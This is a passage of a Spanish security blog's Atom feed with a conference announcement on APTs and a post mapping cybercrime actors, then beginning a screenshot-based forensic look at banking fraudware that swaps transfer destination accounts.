width='72'/><thr:total>8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-9212798740097820583</id><published>2011-10-19T22:35:00.002+02:00</published><updated>2011-10-19T22:35:51.064+02:00</updated><title type='text'>De cabañas y otras cositas...</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-3dhj0bXjSRQ/Tp80bDvcgHI/AAAAAAAACgo/8LMBuzCe-lM/s1600/frase-entrenamiento.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="150" src="http://4.bp.blogspot.com/-3dhj0bXjSRQ/Tp80bDvcgHI/AAAAAAAACgo/8LMBuzCe-lM/s200/frase-entrenamiento.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Este fin de semana nos vamos para el &lt;a href="http://www.informatica64.com/aseguraITCamp3/"&gt;Escorial&lt;/a&gt; para realizar el &amp;lt;&lt;a href="http://www.informatica64.com/aseguraITCamp3/"&gt;aseguraITCamp3&lt;/a&gt;&amp;gt;, ya que por segundo año (consecutivo para mi) y gracias a &lt;a href="http://www.google.es/imgres?q=chema+alonso&amp;amp;um=1&amp;amp;hl=es&amp;amp;client=firefox-a&amp;amp;rls=org.mozilla:es-ES:official&amp;amp;biw=1280&amp;amp;bih=565&amp;amp;tbm=isch&amp;amp;tbnid=5SHtbrTXxet4cM:&amp;amp;imgrefurl=http://blogs.rpp.com.pe/technovida/2010/10/13/entrevista-star-wars-ciencia-ficcion-y-cosas-geeks-con-el-maligno-chema-alonso/&amp;amp;docid=fTGMVGMaiGYbGM&amp;amp;imgurl=http://blogs.rpp.com.pe/technovida/files/2010/10/chema-alonso1.jpg&amp;amp;w=400&amp;amp;h=300&amp;amp;ei=zi-fTv3xL4zzsgbZqrgg&amp;amp;zoom=1&amp;amp;iact=hc&amp;amp;vpx=159&amp;amp;vpy=257&amp;amp;dur=4268&amp;amp;hovh=194&amp;amp;hovw=259&amp;amp;tx=154&amp;amp;ty=127&amp;amp;sig=100447464040215060179&amp;amp;page=1&amp;amp;tbnh=113&amp;amp;tbnw=136&amp;amp;start=0&amp;amp;ndsp=23&amp;amp;ved=1t:429,r:7,s:0"&gt;Chema Alonso&lt;/a&gt; (si, un tipo que le gusta la ecología y no hace mas que hablar y hablar de las FOCAs) me ha permitido impartir una conferencia (de la mano de Bitdefender) sobre &lt;b&gt;Advanced persistent threat&lt;/b&gt; (&lt;b&gt;APT&lt;/b&gt;). Una novedosa e insidiosa forma de atacar empresas sin que te des cuenta de que te han robado lo más intimo de tu compañía. Muchos ya lo habreís leido en el blog, pero aquí lo ampliaré con otros casos que han ocurrido en España.&lt;br /&gt;&lt;br /&gt;Voy a ir acompañado de '&lt;a href="http://www.informatica64.com/aseguraitcamp3/ponente_horatiu_Bandoiu.html"&gt;Horatiu Bandiou&lt;/a&gt;' de Bitdefender. Un tipo rudo, con pinta de mafioso y especialista en armamento y en desarmarte en menos que respiras. Además es un crack en seguridad informática y que ha trabajado para lo mejorcito y peorcito de los gobiernos de Europa,&amp;nbsp; también y sin que esto no signifique nada es Rumano ;-)&lt;br /&gt;&lt;br /&gt;Ya sabes o vienes a esta conferencia o te parte las piernas...&lt;br /&gt;&lt;br /&gt;Nos vemos amigos...!! &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583475030409211074-9212798740097820583?l=conexioninversa.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://conexioninversa.blogspot.com/feeds/9212798740097820583/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583475030409211074&amp;postID=9212798740097820583' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/9212798740097820583'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583475030409211074/posts/default/9212798740097820583'/><link rel='alternate' type='text/html' href='http://conexioninversa.blogspot.com/2011/10/de-cabanas-y-otras-cositas.html' title='De cabañas y otras cositas...'/><author><name>Pedro Sánchez</name><uri>http://www.blogger.com/profile/13523654065853341780</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='22' height='32' src='http://4.bp.blogspot.com/_7dOLVYBL8vA/TNPdwWp9EXI/AAAAAAAACV4/ql9DRpUzjxk/S220/Captura.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-3dhj0bXjSRQ/Tp80bDvcgHI/AAAAAAAACgo/8LMBuzCe-lM/s72-c/frase-entrenamiento.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583475030409211074.post-2570983463870027314</id><published>2011-09-29T22:03:00.000+02:00</published><updated>2011-09-29T22:03:27.329+02:00</updated><title type='text'>El fraude-ware te vigila. Otro de APT</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-USw9f0sDmaI/ToTJYpbb2AI/AAAAAAAACgc/62bnYHngnz0/s1600/Captura.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="180" src="http://3.bp.blogspot.com/-USw9f0sDmaI/ToTJYpbb2AI/AAAAAAAACgc/62bnYHngnz0/s320/Captura.PNG" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hola lectores,&lt;br /&gt;&lt;br /&gt;Parece ser que el último post sobre ataques persistentes ha tenido bastante movimiento y muchos de vosotros me&amp;nbsp;habéis&amp;nbsp;solicitado en muchos correos mas detalles sobre este nuevo tipo de ataque. Como todavía no puedo facilitaros mas información voy a dar una visión mas general de como es el mapa de este tipo de ataques.&lt;br /&gt;&lt;br /&gt;Durante muchos años, los piratas informáticos operan desde China&amp;nbsp; (sean o no responsables) y han estado atacando a un gran número de sistemas comerciales y gubernamentales aquí en España y en el extranjero.&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En la última conferencia de la NcN en Barcelona, hablé veladamente de ello y quisiera destacar una entrevista en el periódico el País que le hizo a&amp;nbsp;Luis Jiménez, responsable de la seguridad electrónica del servicio de inteligencia del CNI y en la que cito literalmente lo que dijo:&amp;nbsp; "España fue blanco de más de 40 ataques "graves", varias instituciones clave fueron tocadas. Cuatro de los 40 ataques alcanzaron al CNI: dos de ellos, al Centro Criptológico Nacional."&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-DN5WdlLQKns/ToBcrY9a62I/AAAAAAAACfo/mrUyMve7Wh4/s1600/Captura+de+pantalla+2011-09-26+a+la%2528s%2529+13.05.37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="207" src="http://4.bp.blogspot.com/-DN5WdlLQKns/ToBcrY9a62I/AAAAAAAACfo/mrUyMve7Wh4/s400/Captura+de+pantalla+2011-09-26+a+la%2528s%2529+13.05.37.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;Extracto de la entrevista&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Otra de las perlas es este gazapo de la televisión estatal China que en una emisión en directo del&amp;nbsp;canal 7 (CCTV 7) en el Instituto Militar del PCCh (partido comunista) muestran en una pantalla los ataques dirigidos a través de Internet a sitios Web.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;En la pantalla se puede mal apreciar una dirección IP:&amp;nbsp;&lt;b&gt;138.26.72.17&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-aqiirxi3oR8/ToBgIb_asyI/AAAAAAAACfs/7_pFmTSyLpw/s1600/Captura+de+pantalla+2011-09-26+a+la%2528s%2529+13.19.57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="260" src="http://4.bp.blogspot.com/-aqiirxi3oR8/ToBgIb_asyI/AAAAAAAACfs/7_pFmTSyLpw/s400/Captura+de+pantalla+2011-09-26+a+la%2528s%2529+13.19.57.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Que buscando por geo-localizacion nos encontramos esto:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-uL-H18J0Eng/ToBgvKVgQlI/AAAAAAAACfw/P9qWtb2qqZc/s1600/Captura+de+pantalla+2011-09-26+a+la%2528s%2529+13.22.21.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://4.bp.blogspot.com/-uL-H18J0Eng/ToBgvKVgQlI/AAAAAAAACfw/P9qWtb2qqZc/s400/Captura+de+pantalla+2011-09-26+a+la%2528s%2529+13.22.21.png" width="376" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span class="Apple-style-span" style="font-size: x-small;"&gt;&lt;b&gt;¿Que estarán haciendo los Chinos en Alabama?&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Vamos mas claro y en botella 'agua'.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;MAPA DE ACTORES&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Viendo los diferentes casos en los que he colaborado mas o menos podría decir que existen varios escenarios:&lt;/div&gt;&lt;div class="separator" style="clear: both;"&gt;&lt;/div&gt;&lt;ul&gt;&lt;li&gt;Mafias -&amp;nbsp;Advanced Persistent Threats&lt;/li&gt;&lt;li&gt;Espionaje Industrial -&amp;nbsp;Advanced Persistent Threats&lt;/li&gt;&lt;li&gt;Ciberguerra -&amp;nbsp;Advanced Persistent Threats&lt;/li&gt;&lt;/ul&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;De ahora en adelante APT, vamos a empezar con la primera:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;MAFIAS - APT&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Su objetivo es obtener beneficios económicos de forma rápida atacando y/o troyanizando al usuario de una entidad financiera. Como si de una empresa se tratase, consiguen realizar toda una cadena de desarrollo, producción , venta y explotación.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-rL1FT6F-y74/ToFwYOHWXFI/AAAAAAAACf4/3sYo5iDeomg/s1600/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+08.42.01.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="85" src="http://4.bp.blogspot.com/-rL1FT6F-y74/ToFwYOHWXFI/AAAAAAAACf4/3sYo5iDeomg/s400/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+08.42.01.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;En la imagen anterior aparecen los siguientes actores:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Desarrollador de exploits:&lt;/b&gt;&amp;nbsp; Es la persona(as) que disponen de la técnica suficiente para la elaboración del malware, no tiene que ser una persona y muchas veces se compone de un equipo que va de tres a cinco programadores. Su precio oscila entre los 10.000€ y 20.000€ dependiendo si desarrolla un 0 Day o consigue un malware indetectable en el tiempo. También se cobra más si es remoto y todavía más caro si afecta a los navegadores de los usuarios.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Vendedor de exploits &amp;amp; packs:&lt;/b&gt; Al igual que el desarrollador de exploits puede ser desde una persona a un equipo. En los casos que he visto pueden ser los mismos integrantes del equipo que desarrolla una forma 'paquetizada' de su producto.&amp;nbsp;También son los que dan 'soporte' a la venta y/o actualizaciones. Pueden ganar entre 1.000€ y 3.000€ dependiendo de su integración y conocimiento del producto con los desarrolladores.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Vendedor de Bots:&lt;/b&gt; Vendría a ser la figura del 'account manager' de cualquier empresa normal, controlan el canal de venta y aunque parezca mentira, su producto estrella no es la venta de 'bots', es la venta de identidad digital, obviamente robada anteriormente. Con esta identidad falsifican tarjetas de crédito y compran dominios que a su vez hospedan y venden. Su figura en todo este proceso es ser transparente, por no decir invisible. Es muy&amp;nbsp;difícil involucrarlo ante la justicia por falta de evidencias. También se dedican a la venta de pornografía infantil.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Es el actor que más dinero gana de la cadena dada su versatilidad en 'otros productos'.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Botmaster y Recolector de cuentas&lt;/b&gt;: Son los compradores finales, que pueden ser las mismas mafias que han 'contratado' el desarrollo del 'producto' o bien entidades menores como grupos organizados o pequeñas mafias. El recolector de cuentas puede ser una persona o grupo que dispone de una gran base de datos de cuentas de correo, preferiblemente de entidades financieras. Su posición es arriesgada dado que son la cabeza visible del ataque o de la gestión del panel de control.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Muleros:&lt;/b&gt; Como ya sabréis son los encargados de obtener el dinero fisicamente desde su propia cuenta corriente quedando&amp;nbsp;un margen disponible del montante para el. Suelen ser los primeros que las fuerzas de seguridad atrapan dada su exposición fisicamente a la hora de personarse en la entidad financiera.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;Víctimas&lt;/b&gt;: 'Sin comentarios'.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;ESPIONAJE INDUSTRIAL - APT&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Muy de moda hoy en día sobre todo en epoca de crisis. Muchas empresas no tienen lo suficiente para invertir en I+D y sale mas rentable 'fotocopiarselo' a la competencia.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Su objetivo es disponer de más información que la competencia y aquí entramos en la guerra de guerrillas, vale todo desde información financiera, documentos confidenciales y planos hasta información privada y si es comprometedora mucho mejor. Esto les da ventaja en la carrera.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-0FWNM6IstTk/ToF6nYhf5QI/AAAAAAAACf8/bo0E-ts3_8I/s1600/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+09.21.38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="91" src="http://3.bp.blogspot.com/-0FWNM6IstTk/ToF6nYhf5QI/AAAAAAAACf8/bo0E-ts3_8I/s400/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+09.21.38.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Los actores apenas han cambiado, tan solo desaparece el vendedor de bots dado que su relación es ahora mucho mas directa y confidencial entre los que piden 'hazme un troyano para la empresa x' y los que lo desarrollan. Los precios aumentan dado que su exposición es mas directa y facil de poder llegar a descubrir (dependiendo de como es la empresa).&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Tan solo destacar o diferenciar que la información obtenida no tiene valor en el mercado solo beneficia a la empresa que lo contrata. Los actores y el canal de distribución es idéntico que en la primera&amp;nbsp;imagen.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;CIBERGUERRA - APT&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;LLeva años durmiendo veladamente, aunque la realidad es que ha despertado con fuerza. Aquí los amos o por lo menos los mas señalados como ciber-agresores es China.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;El anonimato difumina al enemigo y la complejidad de las redes hace imposible controlar el alcance de una acción ofensiva. &lt;br /&gt;&lt;br /&gt;Se ha visto en los ataques contra Estonia, contra Georgia y en julio de 2009, contra Corea del Sur y Estados Unidos: los ataques no venían de un solo sitio sino de decenas, incluidos los países víctimas. Eran ordenadores personales secuestrados mediante malware que esconden la verdadera identidad del enemigo.&lt;br /&gt;&lt;br /&gt;El objetivo de estos hackers de los distintos países no es otro que disponer de información y tener control de actividades, información diplomática y si llega el caso el poder de activar o desactivar ciertas defensas de los países atacados.&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-pHnyhZFK3w8/ToF8f15FcrI/AAAAAAAACgA/5I7CkfUojQU/s1600/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+09.32.41.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="131" src="http://4.bp.blogspot.com/-pHnyhZFK3w8/ToF8f15FcrI/AAAAAAAACgA/5I7CkfUojQU/s400/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+09.32.41.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Aquí los actores al igual que las anteriores imágenes varían poco, salvo que son 'financiados' por los ejércitos especializados. En este caso la cadena de distribución llega hasta el botmaster.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;También otro nuevo escenario entra a formar parte de la vida cotidiana. El grupo Anonymous empieza a atacar tanto a gobiernos, instituciones y empresas privadas con objeto de reivindicar un cambio en la sociedad.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Por lo tanto el mapa queda de la siguiente forma:&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-toiX4_ngOhw/ToHnfY9jVvI/AAAAAAAACgE/k3AIaGE047k/s1600/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+17.09.51.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="298" src="http://1.bp.blogspot.com/-toiX4_ngOhw/ToHnfY9jVvI/AAAAAAAACgE/k3AIaGE047k/s400/Captura+de+pantalla+2011-09-27+a+la%2528s%2529+17.09.51.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Como vemos hay muchos componentes y quízas me olvide alguno, pero podemos decir que están casi todos, muchos de ellos son los que están dejando en ridículo a fuerzas de seguridad, empresas y hasta los mismos Gobiernos. La batalla no ha hecho más que comenzar.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Siguiendo con el anterior post sobre APT he querido mostrar un curioso ataque que duró cierto tiempo y que nos tuvo un mes bastante ocupaditos.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;&amp;nbsp;MAFIA -&amp;nbsp;Advanced Persistent Threats - ·Vigila que te vigilan"&lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Bueno, dado este punto vamos a ver un caso real de un ataque APT sobre una entidad financiera. Este caso lo suelo exponer con un vídeo cuando estoy dando alguna conferencia. En el post voy a poner solo pantallas dado que el vídeo carece de explicación y por lo tanto es más difícil entenderlo. También decir que este ataque ya no tiene efecto dado que se han tomado las medidas oportunas y por otro lado los números de cuenta de las pantallas ya no existen.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Este caso es lo que se denomina un ataque a medida y realizado en exclusiva para una determinada entidad financiera, es decir los atacantes se han tomado la molestia de ir a una oficina bancaria y abrir una cuenta para ver el funcionamiento de la banca electrónica. Para ello habrán analizado las entradas y salidas, la gestión de errores,&amp;nbsp;vulnerabilidad&amp;nbsp;si las hubiera, etc. etc.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Una vez observado el funcionamiento el equipo APT se pone a desarrollar el malware.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;OBJETIVO:&lt;/b&gt; &amp;nbsp;Conseguir dinero de una forma fácil.&amp;nbsp;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;MODUS OPERANDI&lt;/b&gt;:&amp;nbsp; Cuando se realiza una trasferencia económica de una cuenta a otra, el malware cambia la cuenta de destino por un 'pool' de número de cuentas maliciosas o de muleros ubicados en otros países. ¡¡Ahí es ná!!&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;DISTRIBUCION:&lt;/b&gt; Utilizan el método&amp;nbsp;clásico&amp;nbsp;del Phising&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;TIPO DE MALWARE&lt;/b&gt;: En concreto este 'bicho' (realmente no es un malware sería mejor llamarlo 'fraudeware') no es detectado por ningún antivirus por una cosa que es obvia, realmente las acciones del 'bicho' no crean procesos ocultos, ni ficheros, ni almacena contraseñas, tan solo modifica el post de envio, por lo tanto es innocuo, incoloro e&amp;nbsp;inodoro para los antivirus. (simplemente perfecto).&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;b&gt;EMPEZAMOS!! &lt;/b&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Vamos a ver su funcionamiento una vez ejecutado el 'fraudeware' desde el punto de vista de aplicación y simulando ser la victima. &lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Inciamos sesión en la banca electrónica en cuestión, obteniendo la siguiente pantalla con la posición global, es decir nuestras cuentas y tarjetas de crédito.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-bLZxyKIjD_E/ToLr0nHFLuI/AAAAAAAACgI/Mk9jXeOwzNE/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="198" src="http://3.bp.blogspot.com/-bLZxyKIjD_E/ToLr0nHFLuI/AAAAAAAACgI/Mk9jXeOwzNE/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;&amp;nbsp;Posición Global&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;Una vez en este punto, nos proponemos realizar una transferencia a una cuenta conocida. Es decir pasamos 1.000€ de la cuenta total a la cuenta limitada.&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-0QqNXk7MMoI/ToLr5hz__oI/AAAAAAAACgM/bxE6VSfqtQI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="123" src="http://4.bp.blogspot.com/-0QqNXk7MMoI/ToLr5hz__oI/AAAAAAAACgM/bxE6VSfqtQI/s400/2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;span style="font-size: x-small;"&gt;&lt;b&gt;Pantalla de transferencia&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;En este paso, lanzamos Tamper Data, para capturar y poder ver si se modifican los parámetros del post. Aquí se ha realizado con esta utilidad para su comprensión y entendimiento, pero la realidad es que estuvimos varios días monitorizando, procesos, comunicaciones y análizando tráfico "por un tubo"&lt;span style="font-size: x-small;"&gt;&lt;b&gt;.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: left;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-zdKhQE_XBAs/ToLsSk3CLDI/AAAAAAAACgU/UOBbot-B5aY/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="310" 